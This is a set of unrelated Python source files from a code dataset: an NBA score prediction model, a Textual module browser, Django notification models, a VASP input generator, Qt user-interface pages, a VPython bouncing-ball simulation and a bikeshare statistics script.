df1[df1['GAME_ID'] == gameid] # contains target\n # target_game = df1[df1['GAME_ID'] == 29900545] #contains target\n if target_game.shape[0] != 2:\n return None\n relevant_teams = target_game['TEAM_ABBREVIATION'].tolist()\n match_location_away = target_game.loc[target_game['MATCHUP'].str.contains('@')]\n match_location_home = target_game.loc[~target_game['MATCHUP'].str.contains('@')]\n target_game_date = match_location_home['GAME_DATE']\n # match_outcome_home = np.where(match_location_away['WL'] == 'W',0,1) #0 if away team wins\n spread = match_location_home.iloc[0, match_location_home.columns.get_loc('PTS')] + \\\n match_location_away.iloc[0, match_location_away.columns.get_loc('PTS')]\n game_date = match_location_away['GAME_DATE'].values[0]\n home_team = match_location_away['MATCHUP'].str.extract(r'((?<=@.)\\S{3})')[0].tolist()\n away_team = [x for x in relevant_teams if x not in home_team]\n home_df = getTeamStats(home_team[0], game_date)\n away_df = getTeamStats(away_team[0], game_date)\n # normalized_hdf = (home_df - home_df.min()) / (home_df.max() - home_df.min())\n # normalized_adf = (away_df - away_df.min()) / (away_df.max() - away_df.min())\n if home_df.shape == (11, 26) and away_df.shape == (11, 26):\n output = [target_game_date, spread, home_df, away_df]\n else:\n return None\n except:\n return None\n return output\n\n\ndef get_optimization(indf):\n all_games_ids = indf['GAME_ID'].unique()\n pool = get_context(\"fork\").Pool(22) #change to number of cores on machine\n optimization_result = pool.map(getOverUnder, all_games_ids)\n pool.close()\n return optimization_result\n\n\n#read in data\ndf1 = pd.read_csv(root_data_dir + 'gamedf.csv',index_col = 0)\n\n\noptimization_result = get_optimization(df1)\n\ncomplete_dataset = []\nfor val in optimization_result:\n if val != None :\n complete_dataset.append(val)\n\n\ntrain_labels = []\ntrain_features = []\ntest_labels = []\ntest_features = []\n\nfor r in range(0,len(complete_dataset)):\n print(r)\n if (pd.to_datetime(complete_dataset[r][0]) < '2020-01-01').bool():\n train_labels.append(complete_dataset[r][1])\n home_row = 
complete_dataset[r][2].to_numpy().flatten('F')\n away_row = complete_dataset[r][3].to_numpy().flatten('F')\n both_row = np.concatenate((home_row,away_row))\n train_features.append(both_row)\n else:\n test_labels.append(complete_dataset[r][1])\n home_row = complete_dataset[r][2].to_numpy().flatten('F')\n away_row = complete_dataset[r][3].to_numpy().flatten('F')\n both_row = np.concatenate((home_row,away_row))\n test_features.append(both_row)\n\nnum_features = 550\ntrain_labels = np.array(train_labels)\ntrain_features = np.array(train_features)\ntest_labels = np.array(test_labels)\ntest_features = np.array(test_features)\n\n#%%\ntrainlab = np.nan_to_num(train_labels)\ntrainset = np.nan_to_num(train_features)\ntestlab = np.nan_to_num(test_labels)\ntestset = np.nan_to_num(test_features)\n\nfrom tensorflow.keras.layers import Dense, Dropout,Conv1D, MaxPooling1D, Flatten, GlobalAvgPool1D\nfrom tensorflow.keras import Sequential\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error\nimport tensorflow as tf\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.regularizers import l1\n\n\n\nmodel = Sequential()\nmodel.add(Dense((num_features), input_dim=(num_features), activation='relu'))\n# model.add(Dropout(0.2))\nmodel.add(Dense(500,activation='relu'))\nmodel.add(Dense(500,activation='relu'))\nmodel.add(Dense(500,activation='relu'))\nmodel.add(Dense(500,activation='relu'))\nmodel.add(Dense(500,activation='relu'))\nmodel.add(Dense(500,activation='relu'))\nmodel.add(Dense(500,activation='relu'))\nmodel.add(Dense(500,activation='relu'))\n# model.add(Dropout(0.4))\nmodel.add(Dense(1, activation='linear'))\nmodel.summary()\n\nmodel.compile(loss='mean_absolute_error', optimizer=optimizers.Adam(lr=0.000001), metrics=['mae'])\nearly_stop = tf.keras.callbacks.EarlyStopping(monitor='val_mae', patience=15)\n#\n# opt = SGD(lr=0.001, momentum=0.9)\n# model.compile(loss='binary_crossentropy', optimizer='Adam', metrics=['accuracy'])\n\n\nhistory = model.fit(trainset, trainlab, epochs=4000, batch_size=20000, callbacks=[early_stop],\n validation_split=.2,shuffle=False)\n\nfrom matplotlib import pyplot\npyplot.subplot(212)\npyplot.title('MAE')\npyplot.plot(history.history['mae'], label='train')\npyplot.plot(history.history['val_mae'], label='test')\npyplot.legend()\npyplot.show()\n\n\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error\npredictions = model.predict(testset).flatten()\npred_df = pd.DataFrame([predictions,testlab]).T\npred_df.columns = ['predictions','labels']\nprint(mean_squared_error(pred_df['labels'], pred_df['predictions'], squared=False))\nprint(mean_absolute_error(pred_df['labels'], pred_df['predictions']))\n22.03\n17.17\n21.53\n16.80\n21.54\n16.69\n20.96\n16.39\n20.68\n16.2\n20.63\n16.18\n20.59\n16.12\n\n#bench\n20.27\n15.91\n\n#new bench\n20.18\n15.84\n\n\n\n#%%\ntrainlab = np.nan_to_num(train_labels)\ntrainset = np.nan_to_num(train_features)\ntestlab = np.nan_to_num(test_labels)\ntestset = np.nan_to_num(test_features)\n\n\nimport xgboost as xgb\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error\n\ndtrain = xgb.DMatrix(trainset, label=trainlab)\n\nparams = {}\nparams['eval_metric'] = 'mae'\nparams['tree_method'] = 'gpu_hist'\n# params['colsample_bytree'] = .849\n# params['gamma'] = .07\nparams['learning_rate'] = .01\nparams['max_depth'] = 5\n# params['early_stopping_rounds'] = 30\nparams['objective'] = 'reg:squarederror'\n# params['scale_pos_weight'] = 2\n\n\nnum_round = 1200\n\nbst = 
xgb.train(params, dtrain,num_round)\n\n\ndtest = xgb.DMatrix(testset)\npredictions = bst.predict(dtest)\npred_df = pd.DataFrame([predictions,test_labels]).transpose()\npred_df.columns = ['predictions','labels']\nprint(mean_squared_error(pred_df['labels'], pred_df['predictions'], squared=False))\nprint(mean_absolute_error(pred_df['labels'], pred_df['predictions']))","repo_name":"davidsanchez222/nba_bets","sub_path":"models/danny_feature_engineering.py","file_name":"danny_feature_engineering.py","file_ext":"py","file_size_in_byte":10571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73231434458","text":"import importlib\nimport inspect\nimport pkgutil\n\nfrom textual import events\nfrom textual.app import App, ComposeResult\nfrom textual.containers import Container, Horizontal\nfrom textual.widgets import Static\n\nfrom shira._object_panel import ObjectPanel\nfrom shira._search import SearchBar, SearchCompletion, CompletionCandidate\n\nNOT_FOUND = \"poi12zn@$][]daza\"\n\n\nclass Shira(App):\n def compose(self) -> ComposeResult:\n self.modules = {module.name: module for module in pkgutil.iter_modules()}\n self.original_candidates = [\n CompletionCandidate(\n primary=module.name,\n secondary=\"pkg\" if module.ispkg else \"mod\",\n original_object=module,\n )\n for module in self.modules.values()\n ]\n yield Horizontal(\n Static(\">\", id=\"search-prompt\"),\n SearchBar(id=\"search-input\"),\n id=\"search-bar-container\",\n )\n yield Container(\n SearchCompletion(\n candidates=self.original_candidates,\n id=\"search-completion\",\n ),\n id=\"search-completion-container\",\n )\n yield Container(\n ObjectPanel(id=\"object-panel\"),\n id=\"body-container\",\n )\n\n def on_mount(self, event: events.Mount) -> None:\n self.query_one(\"#search-input\").focus()\n\n def on_search_bar_updated(self, event: SearchBar.Updated) -> None:\n completion = self.app.query_one(SearchCompletion)\n\n value = event.value\n if len(value) < 2:\n completion.parent.display = False\n return\n\n cursor_position = event.cursor_position\n\n # Fill up the list of candidates\n # How do we determine the candidates?\n # Active object should be the right-most resolvable part in the string\n # The left-most part should look in the self.modules to kick off the search.\n # TODO: Cache active objects, don't naively reset it each time if it's the\n # same as it was before\n parts = [part for part in value.split(\".\")]\n\n object_panel = self.query_one(\"#object-panel\", ObjectPanel)\n search_part = \"\"\n if len(parts) == 0:\n # If we're empty, then there should be no candidates\n completion.update_candidates([])\n elif len(parts) == 1:\n # If there's only one part, then we're searching for module_name in self.modules\n module_name = parts[0]\n\n # Trim down the candidate list to those containing the query string\n candidates = []\n for candidate in self.original_candidates:\n if module_name in candidate.primary:\n candidates.append(candidate)\n if module_name == candidate.primary:\n object_panel.active_object = candidate.original_object\n\n # Update the dropdown list with the new candidates\n completion.update_candidates(candidates)\n # Tell the dropdown list about the part to use for highlighting matching candidates\n # Since there's only 1 part, we don't need to do anything tricky here\n search_part = module_name\n else:\n # We have multiple parts now, so finding our list of candidates is more complex\n # We'll look through the parts to get to the rightmost valid part 
BEFORE the cursor position.\n module_name = parts[0]\n other_parts = parts[1:]\n\n search_input = self.query_one(\"#search-input\", SearchBar)\n cursor_position = search_input.cursor_position\n\n # Now we need to get into a scenario where we have an object that we wish to search,\n # and a search string to apply to it\n object_to_search = self.modules.get(module_name)\n\n if object_to_search is None:\n completion.update_candidates([])\n else:\n # TODO: We should update this loop to only go up to the cursor position\n search_part = \"\"\n for part in other_parts:\n if part == \"\":\n break\n\n if isinstance(object_to_search, pkgutil.ModuleInfo):\n object_to_search = importlib.import_module(\n object_to_search.name\n )\n\n # Look for this part on the current object to search\n object_dict = getattr(object_to_search, \"__dict__\", None)\n if object_dict is None:\n completion.update_candidates([])\n break\n\n obj = object_dict.get(part, NOT_FOUND)\n if obj == NOT_FOUND:\n search_part = part\n break\n else:\n object_to_search = obj\n\n if object_to_search is not None:\n if isinstance(object_to_search, pkgutil.ModuleInfo):\n object_to_search = importlib.import_module(\n object_to_search.name\n )\n\n if hasattr(object_to_search, \"__dict__\"):\n new_candidates = []\n for name, obj in object_to_search.__dict__.items():\n print(obj, getattr(obj, \"__package__\", None))\n if name.startswith(\"__\") and name.endswith(\"__\"):\n continue\n\n is_module = inspect.ismodule(obj)\n if is_module and getattr(\n obj, \"__package__\", \"-x-\"\n ) == getattr(object_to_search, \"__package__\", \"-y-\"):\n new_candidates.append(\n CompletionCandidate(\n name, \"mod\", original_object=obj\n )\n )\n elif not is_module:\n obj_module = inspect.getmodule(obj)\n if inspect.ismodule(object_to_search):\n include = obj_module is object_to_search\n else:\n include = obj_module is inspect.getmodule(\n object_to_search\n )\n\n if include:\n new_candidates.append(\n CompletionCandidate(\n name, None, original_object=obj\n )\n )\n\n # If it's a module, include if it has same __package__\n # If it's not a module, include if in same module\n\n completion.update_candidates(new_candidates)\n\n object_panel.active_object = object_to_search\n\n # The search bar has updated, so lets update the completion dropdown\n # First, align it with the cursor position\n completion_parent = self.app.query_one(\"#search-completion-container\")\n top, right, bottom, left = completion_parent.styles.margin\n completion_parent.styles.margin = (\n top,\n right,\n bottom,\n cursor_position + 3,\n )\n completion.filter = search_part\n completion.highlight_index = completion.highlight_index\n\n\napp = Shira(css_path=\"shira.scss\")\n\n\ndef run():\n app.run()\n","repo_name":"darrenburns/shira","sub_path":"shira/shira.py","file_name":"shira.py","file_ext":"py","file_size_in_byte":7751,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"68"} +{"seq_id":"39532220313","text":"from django.db import models\nfrom cse312.users.models import User\nfrom cse312.message.models import ChatMessage\n\nclass Notifications(models.Model):\n user = models.ForeignKey(User, related_name=\"main_user\", null=True, on_delete=models.CASCADE)\n sender = models.ForeignKey(User, related_name=\"sending_user\", null=True, on_delete=models.CASCADE)\n message = models.ManyToManyField(ChatMessage)\n\n @classmethod\n def add(cls, user, sender, message):\n notifications, created = cls.objects.get_or_create(\n user = user,\n sender = sender\n )\n 
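The shira.py record above resolves a dotted search string ("pkg.attr.attr") by importing the leading part as a module and walking the remaining parts with getattr, treating the first part that fails to resolve as the live search term. A minimal sketch of that idea, assuming nothing beyond the standard library; `resolve_dotted` is a hypothetical helper name, not part of the original source:

```python
# Sketch of the dotted-path resolution used in shira.py: import the first
# part, then getattr-walk the rest; the first unresolved part is returned
# as the string still being searched for.
import importlib

def resolve_dotted(path: str):
    """Return (resolved_object, unresolved_part) for a dotted path."""
    module_name, *rest = path.split(".")
    try:
        obj = importlib.import_module(module_name)
    except (ImportError, ValueError):
        return None, module_name
    for part in rest:
        if not part:
            break
        nxt = getattr(obj, part, None)
        if nxt is None:
            return obj, part  # keep searching for `part` on `obj`
        obj = nxt
    return obj, ""

# e.g. resolve_dotted("json.dum") -> (<module 'json'>, "dum")
```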
notifications.message.add(message)\n\n @classmethod\n def remove(cls, user, sender, message):\n notifications, created = cls.objects.get_or_create(\n user = user,\n sender = sender\n )\n notifications.delete()\n\n def get_count(self):\n return self.message.all().count()\n\n def get_message(self):\n if self.get_count() > 0:\n return self.message.all()[0]","repo_name":"lawzeem/CircleSocial","sub_path":"cse312/cse312/notifications/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21664503172","text":"import os\nos.environ['PMG_VASP_PSP_DIR'] = 'D:\\\\Users\\\\RyanTrottier\\\\Documents\\\\Scrap\\\\PMG'\nos.environ['VASP_PSP_DIR'] = 'D:\\\\Users\\\\RyanTrottier\\\\Documents\\\\Scrap\\\\PMG'\nimport All_Materials\n# from All_Materials import done,csv_dict,mat_dict\nfrom ZachsMaterials import done, mat_dict\nfrom AddDB import load_db\nfrom Database_Tools import *\nfrom Classes_Pymatgen import *\nimport pymongo\nimport numpy as np\n\n#%%\nl = 7\nmatch_criteria = {\n # 'pathway_count': {'$exists' : False},\n # 'defect_type': {'$exists' : False},\n # 'ts_type': {'$exists' : False},\n 'labels' : {'$all' : ['unit_cell'],\n '$nin' : ['surface']}\n # 'poscar.structure.lattice.a': {'$lt': l},\n}\n\nfolder = 'D:\\\\Users\\\\RyanTrottier\\\\Documents\\\\Scrap\\\\lobsters'\n(db,fs,client) = load_db()\n\n# for material in csv_dict.materials.keys():\nfor material in mat_dict.keys():\n material = material.lower()\n# for material in ['bicoo3']:\n# match_criteria['material'] = {'$all': [material], '$nin' : ['from_zach']}\n match_criteria['material'] = {'$all': [material] + ['from_zach']}\n runs = list(db.database.find(match_criteria).sort('energy', pymongo.ASCENDING))\n\n if 'ICOHPLIST_lobster' in runs[0]:\n continue\n print(\"{}: {}\".format(material, len(runs)))\n if len(runs) > 0:\n [print(x['energy']) for x in runs]\n if len(runs) >= 1:\n run = runs[0]\n material_folder = os.path.join(folder, material)\n os.makedirs(material_folder, exist_ok=True)\n incar = Incar.from_dict(run['incar'])\n temp = get_file(fs, run['outcar'])\n magmom = [np.round(x['tot'],1) for x in Outcar(temp).magnetization]\n os.remove(temp)\n incar['MAGMOM'] = magmom\n incar['SYSTEM'] = material\n incar['KPAR'] = 3\n incar['NPAR'] = 3\n incar.write_file(os.path.join(material_folder, 'INCAR'))\n Kpoints.from_dict(run['kpoints']).write_file(os.path.join(material_folder, 'KPOINTS'))\n Poscar.from_dict(run['poscar']).write_file(os.path.join(material_folder, 'POSCAR'))\n Potcar(run['potcar']).write_file(os.path.join(material_folder, 'POTCAR'))\n with open(os.path.join(material_folder, 'DATABASE'), 'w') as f:\n f.write('''material {}\nrelaxation\nunit_cell'''.format(' '.join(run['material'])))","repo_name":"rtrottie/materials","sub_path":"make lobsters.py","file_name":"make lobsters.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4046910313","text":"import sys\nimport os\n\n\nfrom PySide2.QtWidgets import QApplication, QMainWindow, QDialog, QPushButton\nfrom PySide2.QtCore import QFile\nfrom PySide2.QtUiTools import QUiLoader\n\nclass DeviceSelector(QDialog):\n def __init__(self):\n super().__init__()\n self.ui = QUiLoader().load(\"deviceselector.ui\")\n self.ui.show()\n self.closebutton = self.ui.findChild(QPushButton, \"dialogCloseButton\")\n self.closebutton.clicked.connect(self.ui.close)\n\nclass 
TAPmain(QMainWindow):\n def __init__(self):\n super().__init__()\n self.ui = QUiLoader().load(\"form.ui\")\n self.ui.show()\n self.initSettingsButton()\n\n def initSettingsButton(self):\n self.button = self.ui.findChild(QPushButton, \"selectDevicesButton\")\n self.button.clicked.connect(self.openDeviceSelector)\n \n def openDeviceSelector(self):\n self.devselector = DeviceSelector()\n \nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n w = TAPmain()\n sys.exit(app.exec_())\n","repo_name":"juusolain/TimecodeAudioPlayer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21531030682","text":"from PyQt5 import QtWidgets, QtCore, QtGui\nimport database as db\nimport css\n\n\nclass ProductListPage(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Product List\")\n self.resize(800, 600)\n\n self.logo = QtWidgets.QLabel(self)\n self.logo.setGeometry(QtCore.QRect(0, 0, 181, 111))\n self.logo.setPixmap(QtGui.QPixmap(\"./src/s_icon-nbg.png\"))\n self.logo.setObjectName(\"logo\")\n self.logo.mousePressEvent = lambda event: self.goToMainShop(\"CL00\")\n\n self.Header = QtWidgets.QLabel(self)\n self.Header.setGeometry(QtCore.QRect(240, 30, 481, 51))\n self.Header.setObjectName(\"Header\")\n self.Header.setAlignment(QtCore.Qt.AlignCenter)\n self.Header.setText(\"Welcome to Main Shop\")\n\n self.layout = QtWidgets.QVBoxLayout(self)\n\n self.tableWidget = QtWidgets.QTableWidget(self)\n self.tableWidget.setColumnCount(5)\n self.tableWidget.setHorizontalHeaderLabels([\"PRid\", \"Title\", \"Price\", \"Description\", \"Active\"])\n\n self.loadProducts()\n self.loadCSS()\n\n self.layout.addWidget(self.logo)\n self.layout.addWidget(self.Header)\n self.layout.addWidget(self.tableWidget)\n\n def loadCSS(self):\n style_sheet = f\"\"\"\n QLabel#Header{{\n {css.label_stylesheet_header}\n }}\n QPushButton{{\n {css.push_button_stylesheet_red_min}\n }}\n\n \"\"\"\n\n self.setStyleSheet(style_sheet)\n\n def loadProducts(self):\n products = db.showAllProduct()\n self.tableWidget.setRowCount(len(products))\n\n for row, product in enumerate(products):\n PRidItem = QtWidgets.QTableWidgetItem(str(product[0]))\n titleItem = QtWidgets.QTableWidgetItem(str(product[1]))\n price = \"{:,}\".format(int(product[2]))\n\n priceItem = QtWidgets.QTableWidgetItem(str(price))\n descriptionItem = QtWidgets.QTableWidgetItem(str(product[3]))\n activeItem = QtWidgets.QTableWidgetItem(str(product[4]))\n\n self.tableWidget.setItem(row, 0, PRidItem)\n self.tableWidget.setItem(row, 1, titleItem)\n self.tableWidget.setItem(row, 2, priceItem)\n self.tableWidget.setItem(row, 3, descriptionItem)\n self.tableWidget.setItem(row, 4, activeItem)\n\n if product[4] == \"1\":\n activeItem.setFlags(QtCore.Qt.ItemIsEnabled)\n else:\n button = QtWidgets.QPushButton(\"Activate\")\n button.clicked.connect(lambda _, PRid=str(product[0]): self.activeProduct(PRid))\n self.tableWidget.setCellWidget(row, 4, button)\n\n self.tableWidget.resizeColumnsToContents()\n\n def activeProduct(self, PRid):\n success = db.activeProduct(PRid)\n if success:\n QtWidgets.QMessageBox.information(self, \"Confirmation\", \"Product has been activated.\")\n self.loadProducts()\n else:\n QtWidgets.QMessageBox.warning(self, \"Error\", \"Failed to activate product.\")\n\n def goToMainShop(self, CLid):\n from mainShop import MainShop\n self.close()\n self.mainShop = MainShop(CLid)\n 
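The ProductListPage record above wires each table row's button with `lambda _, PRid=str(product[0]): self.activeProduct(PRid)`. The default argument is what pins the current row's id at definition time; without it, every button created in the loop would see the loop variable's final value. A plain-Python sketch of the late-binding pitfall that pattern avoids (no Qt needed, so it stays runnable):

```python
# Late-binding pitfall: all three closures read i's final value (2).
broken = [lambda: i for i in range(3)]
print([f() for f in broken])   # [2, 2, 2]

# Fix used in loadProducts above: capture the value as a default argument.
fixed = [lambda i=i: i for i in range(3)]
print([f() for f in fixed])    # [0, 1, 2]
```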
self.mainShop.show()\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication([])\n product_list_page = ProductListPage()\n product_list_page.show()\n app.exec_()\n","repo_name":"MG-530/online_shop_PYQT","sub_path":"ProductListPage.py","file_name":"ProductListPage.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15070355464","text":"from vpython import *\n#GlowScript 3.1 VPython\n#create our sphere\nball = sphere(pos=vector(-5,0,0), radius=0.5, color=color.green, make_trail=True)\nball2 = sphere(pos=vector(5,0,0), radius=0.5, color=color.yellow, make_trail=True)\n#create our wall, there are nine colors red, green, blue, yellow, magenta,\n#cyan, orange, black, and white.\nwallR = box(pos=vector(6,0,0), size=vector(.5,12,12.5), color=color.blue)\nwallL = box(pos=vector(-6,0,0), size=vector(.5,12,12.5), color=color.blue)\nwallBK = box(pos=vector(0,0,-6), size=vector(12,12,.5), color=color.red)\nwallT = box(pos=vector(0,6,0), size=vector(12.5,.5,12.5), color=color.green)\nwallBT = box(pos=vector(0,-6,0), size=vector(12.5,.5,12.5), color=color.green)\n#give our ball velocity\nball.velocity = vector(25,10,-12)\nball2.velocity = vector(15,15,7)\n#our dt is showing how much we are changing\ndt = 0.005\n#time starts at 0\nt = 0\n#velocity arrow visual with scaler to make arrow correct size\nvscale = 0.1\nvarr = arrow(pos=ball.pos, axis=vscale*ball.velocity, color=color.yellow)\nvarr2 = arrow(pos=ball2.pos, axis=vscale*ball2.velocity, color=color.yellow)\n#we update position based on velocity and change\nscene.autoscale = True \nwhile t<1000000:\n rate(100)\n randnum = random()\n# controls right and left wall bounce\n if (ball.pos.x + .5) > (wallR.pos.x - .5):\n ball.velocity.x = -ball.velocity.x\n ball.color=color.cyan\n if (ball.pos.x - .5) < (wallL.pos.x + .5):\n ball.velocity.x = -ball.velocity.x\n ball.color=color.green\n \n\n if (ball2.pos.x + .5) > (wallR.pos.x - .5):\n ball2.velocity.x = -ball2.velocity.x\n ball2.color=color.red\n if (ball2.pos.x - .5) < (wallL.pos.x + .5):\n ball2.velocity.x = -ball2.velocity.x\n ball2.color=color.yellow\n# controls front and back wall bounce \n if (ball.pos.z - .5) < (wallBK.pos.z + .5):\n ball.velocity.z = -ball.velocity.z\n ball.color=color.orange\n if (ball.pos.z + .5) > (-wallBK.pos.z - .5):\n ball.velocity.z = -ball.velocity.z\n ball.color=color.yellow\n \n if (ball2.pos.z - .5) < (wallBK.pos.z + .5):\n ball2.velocity.z = -ball2.velocity.z\n ball.color=color.purple\n if (ball2.pos.z + .5) > (-wallBK.pos.z - .5):\n ball2.velocity.z = -ball2.velocity.z\n ball.color=color.white\n# controls top and bottom wall bounce\n if (ball.pos.y + .5) > (wallT.pos.y - .5):\n ball.velocity.y = -ball.velocity.y\n ball.color=color.green\n if (ball.pos.y - .5) < (wallL.pos.x + .5):\n ball.velocity.y = -ball.velocity.y\n ball.color=color.green\n \n if (ball2.pos.y + .5) > (wallT.pos.y - .5):\n ball2.velocity.y = -ball2.velocity.y\n ball2.color=color.black\n if (ball2.pos.y - .5) < (wallL.pos.x + .5):\n ball2.velocity.y = -ball2.velocity.y\n ball2.color=color.cyan\n# updating balls position and arrrow position\n ball.pos = ball.pos + ball.velocity*dt\n varr.pos=ball.pos\n varr.axis=ball.velocity*vscale\n \n ball2.pos = ball2.pos + ball2.velocity*dt\n varr2.pos=ball2.pos\n varr2.axis=ball2.velocity*vscale\n t = t + dt\n 
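The VPython record above bounces each ball by flipping one velocity component whenever the ball's edge (position plus radius) crosses a wall face. A one-dimensional sketch of that update rule; the wall position, radius, and step size are illustrative values, not taken from the scene:

```python
# 1-D bounce rule: advance position, then reflect the velocity when the
# ball's edge passes the wall face (wall centre 6.0, half-thickness 0.25).
radius, wall = 0.5, 6.0 - 0.25   # wall face at x = 5.75
x, vx, dt = 0.0, 25.0, 0.005
for _ in range(100):
    x += vx * dt
    if x + radius > wall or x - radius < -wall:
        vx = -vx
print(x, vx)
```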
\n","repo_name":"edwardb1203/Vpythonprojects","sub_path":"edwardunc1_vectorballpaths.py","file_name":"edwardunc1_vectorballpaths.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21438553929","text":" #Importing time, pandas and numpy libraries\nimport time\nimport pandas as pd\nimport numpy as np\n\n #City data dictionary for user input\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n #month and days data set\nmonths = ['january', 'february', 'march', 'april', 'may', 'june','all']\ndays = ['sunday','monday','tuesday','wednesday','thursday','friday','saturday','all']\n\n #function for parsing filters\ndef get_filters():\n \"\"\"\n Requests user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Hello! Let\\'s explore some US bikeshare data!')\n # TO DO: get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n city = input(\"Enter the city :choices are {}\\n\".format(list(CITY_DATA.keys()))).lower()\n while city not in CITY_DATA:\n print(\"Invalid input\")\n city = input(\"Enter the city :choices are {}\\n\".format(list(CITY_DATA.keys()))).lower()\n continue\n\n # TO DO: get user input for month (all, january, february, ... , june)\n month = input(\"Enter month :choices are {}\\n\".format(months)).lower()\n while month not in months:\n print(\"Invalid input\")\n month = input(\"Enter the month :choices are {}\\n\".format(months)).lower()\n continue\n\n # TO DO: get user input for day of week (all, monday, tuesday, ... 
sunday)\n day = input(\"Enter the day :choices are {}\\n\".format(days)).lower()\n while day not in days:\n print(\"Invalid input\")\n day = input(\"Enter the day :choices are {}\\n\".format(days)).lower()\n continue\n\n print('-'*40)\n return city, month, day\n\n #Function definition for loading the data based on city, month and day\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n # load data file into a dataframe\n df = pd.read_csv(CITY_DATA[city])\n\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # extract month and day of week from Start Time to create new columns\n df['month'] = df['Start Time'].dt.month\n df['day'] = df['Start Time'].dt.weekday_name\n\n\n # filter by month if applicable\n if month != 'all':\n # use the index of the months list to get the corresponding int\n months = ['january', 'february', 'march', 'april', 'may', 'june']\n month = months.index(month)+1\n\n # filter by month to create the new dataframe\n df = df.loc[df['month'] == month]\n\n # filter by day of week if applicable\n if day != 'all':\n # filter by day of week to create the new dataframe\n df = df.loc[df['day'] == day.title()]\n\n return df\n\n #define function for time stats\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel..........\\n')\n start_time = time.time()\n\n # TO DO: display the most common month\n common_month = df['month'].mode()[0]\n\n\n # TO DO: display the most common day of week\n common_day = df['day'].mode()[0]\n\n\n # TO DO: display the most common start hour\n df['hour'] = df['Start Time'].dt.hour\n common_start_hour = df['hour'].mode()[0]\n\n print(\"\\nThe common month, day and start hour respectively is \",common_month,common_day,common_start_hour)\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n #define function for station statistics\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # TO DO: display most commonly used start station\n common_start_station = df['Start Station'].mode()[0]\n\n\n # TO DO: display most commonly used end station\n common_end_station = df['End Station'].mode()[0]\n\n\n # TO DO: display most frequent combination of start station and end station trip\n df['combined_station'] = df['Start Station'] + df['End Station']\n common_combined_station = df['combined_station'].mode()[0]\n\n print(\"\\nThe common start station is\", common_start_station)\n print(\"\\nThe common end station is\", common_end_station)\n print(\"\\nThe common combined station is\", common_combined_station)\n\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n #define function for statistics based on trip duration\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # TO DO: display total travel time\n 
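The bikeshare record above derives month/day/hour columns with the pandas `.dt` accessor and takes their `mode()` for the most common values. A tiny self-contained illustration on synthetic timestamps (note, as an aside, that `dt.weekday_name` as used in the original was removed in pandas 1.0 in favour of `dt.day_name()`):

```python
# Minimal version of the time_stats pattern: parse timestamps, derive
# calendar fields, take the mode. Data below is synthetic.
import pandas as pd

df = pd.DataFrame({"Start Time": ["2017-01-01 09:15:00",
                                  "2017-01-08 09:40:00",
                                  "2017-02-03 17:05:00"]})
df["Start Time"] = pd.to_datetime(df["Start Time"])
df["month"] = df["Start Time"].dt.month
df["hour"] = df["Start Time"].dt.hour
print(df["month"].mode()[0], df["hour"].mode()[0])   # 1 9
```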
total_travel_time = df['Trip Duration'].sum()\n\n\n # TO DO: display mean travel time\n mean_travel_time = df['Trip Duration'].mean()\n\n print('\\nThe total travel time is',total_travel_time)\n print('\\nThe mean travel time is',mean_travel_time)\n\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n #define function for user based statistics\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats....\\n')\n start_time = time.time()\n\n # TO DO: Display counts of user types\n try:\n user_type = df['User Type'].value_counts()\n except KeyError:\n user_type = 'none (due to no data)'\n\n # TO DO: Display counts of gender\n try:\n gender_count = df['Gender'].value_counts()\n except KeyError:\n gender_count = 'none (due to no data)'\n\n\n # TO DO: Display earliest, most recent, and most common year of birth\n try:\n earliest_birth_year = df['Birth Year'].min()\n\n recent_birth_year = df['Birth Year'].max()\n\n common_birth_year = df['Birth Year'].mode()\n except 